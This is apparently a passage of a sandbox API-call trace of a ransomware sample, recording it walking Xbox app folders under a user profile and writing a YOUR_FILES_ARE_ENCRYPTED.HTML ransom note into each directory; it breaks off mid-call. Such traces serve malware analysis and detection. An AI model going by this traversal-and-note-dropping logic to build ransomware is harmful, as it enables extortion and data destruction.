0x313b008 [0120.856] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData" [0120.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\*" [0120.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.857] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.857] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.857] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.857] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.857] GetProcessHeap () returned 0x600000 [0120.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.858] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.859] CloseHandle (hObject=0x324) returned 1 [0120.859] GetProcessHeap () returned 0x600000 [0120.859] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.859] GetProcessHeap () returned 0x600000 [0120.859] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.859] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.859] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.859] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState") returned 90 [0120.859] GetProcessHeap () returned 0x600000 [0120.859] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.859] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState" [0120.859] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\*" [0120.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.859] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.859] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.860] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.860] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0120.860] GetProcessHeap () returned 0x600000 [0120.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.860] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.861] CloseHandle (hObject=0x324) returned 1 [0120.862] GetProcessHeap () returned 0x600000 [0120.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.862] GetProcessHeap () returned 0x600000 [0120.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.862] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.862] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0120.862] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0120.862] GetProcessHeap () returned 0x600000 [0120.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.863] WriteFile (in: hFile=0x214, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.864] CloseHandle (hObject=0x214) returned 1 [0120.864] GetProcessHeap () returned 0x600000 [0120.864] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.864] GetProcessHeap () returned 0x600000 [0120.864] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.865] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", cAlternateFileName="MICROS~1.XBO")) returned 1 [0120.865] StrStrIW (lpFirst="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.865] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned 91 [0120.865] GetProcessHeap () returned 0x600000 [0120.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.866] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy" [0120.866] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\*" [0120.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.868] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.869] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.869] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.869] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC") returned 94 [0120.869] GetProcessHeap () returned 0x600000 [0120.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.870] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC" [0120.870] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\*" [0120.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be76e20, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.875] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be76e20, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.875] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.875] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.875] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache") returned 104 [0120.875] GetProcessHeap () returned 0x600000 [0120.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.876] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache" [0120.876] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\*" [0120.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.877] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.877] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314e708, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.877] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.877] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.877] GetProcessHeap () returned 0x600000 [0120.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.878] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.879] CloseHandle (hObject=0x324) returned 1 [0120.879] GetProcessHeap () returned 0x600000 [0120.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.879] GetProcessHeap () returned 0x600000 [0120.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.879] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9be50bc7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be50bc7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be50bc7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.879] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.879] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies") returned 106 [0120.879] GetProcessHeap () returned 0x600000 [0120.879] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.879] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies" [0120.879] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\*" [0120.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\*", 